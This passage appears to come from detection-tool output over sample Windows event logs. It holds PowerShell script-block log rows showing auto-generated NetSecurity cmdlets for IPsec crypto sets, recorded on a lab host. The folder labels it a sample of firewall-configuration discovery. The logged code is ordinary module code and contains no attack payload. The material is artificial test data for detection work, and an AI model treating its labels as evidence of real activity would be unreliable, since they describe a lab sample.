[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { 
[object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeCryptoSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh 
Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; 